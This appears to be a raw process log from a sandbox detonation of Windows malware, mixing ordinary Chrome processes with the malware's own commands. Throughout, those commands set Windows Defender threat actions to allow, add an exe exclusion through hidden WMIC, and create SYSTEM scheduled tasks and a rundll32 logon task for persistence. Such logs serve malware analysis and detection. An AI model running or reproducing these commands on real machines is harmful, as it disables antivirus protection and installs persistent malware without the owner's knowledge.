"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3708 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3616 --field-trial-handle=2904,i,18074322322295882051,5199891644126132132,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4440 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:1
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4056 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4732 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4896 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dFoJmIVNgWiokFVCHjs2" /F /xml "C:\Program Files (x86)\PyvCjIxDuxQTC\BdLlUNZ.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4380 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:8
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\KrbkREgJ\PCumqNk.exe
"C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\KrbkREgJ\PCumqNk.exe" /S ZW
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bsuAwLimisXNmJFuDt"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5148 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:1
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dTyeYvmCU\hPmSnF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yoGdnYnzlZOyEUZ" /V1 /F
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yoGdnYnzlZOyEUZ2" /F /xml "C:\Program Files (x86)\dTyeYvmCU\UjMnXML.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yoGdnYnzlZOyEUZ"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yoGdnYnzlZOyEUZ"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bUjWiYKnFLBNBg" /F /xml "C:\Program Files (x86)\EJgSdoUbjkoU2\gpvKoUa.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MXVPsGGZsUdpk2" /F /xml "C:\ProgramData\SFedefwyVZzcKDVB\QBuivhw.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "prMGXFkeeUTMdhmNg2" /F /xml "C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR\AVPMryD.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe722ab58,0x7fffe722ab68,0x7fffe722ab78
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dFoJmIVNgWiokFVCHjs2" /F /xml "C:\Program Files (x86)\PyvCjIxDuxQTC\dvPHuzN.xml" /RU "SYSTEM"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1988 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3068 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3920 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ivLBk1" /SC once /ST 00:26:32 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ivLBk1"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe722ab58,0x7fffe722ab68,0x7fffe722ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1996,i,7273063191684898071,1914254266406567550,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4416 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4684 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=1996,i,7273063191684898071,1914254266406567550,131072 /prefetch:8
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3144 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bsuAwLimisXNmJFuDt" /SC once /ST 01:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\KrbkREgJ\PCumqNk.exe\" gs /S" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C schtasks /run /I /tn bsuAwLimisXNmJFuDt"
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bsuAwLimisXNmJFuDt
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bsuAwLimisXNmJFuDt
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\KrbkREgJ\PCumqNk.exe
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\KrbkREgJ\PCumqNk.exe gs /S
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5052 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ivLBk1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6208 -ip 6208
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iHAtfpaAUcCnRIDUD"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4440 -ip 4440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6208 -s 1040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7136 -ip 7136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 2136
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "doZbz1" /SC once /ST 00:16:40 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5172 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "doZbz1"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe722ab58,0x7fffe722ab68,0x7fffe722ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4268 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1604 --field-trial-handle=1496,i,16854705330965467861,10775079284855809842,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1912 --field-trial-handle=1496,i,16854705330965467861,10775079284855809842,131072 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
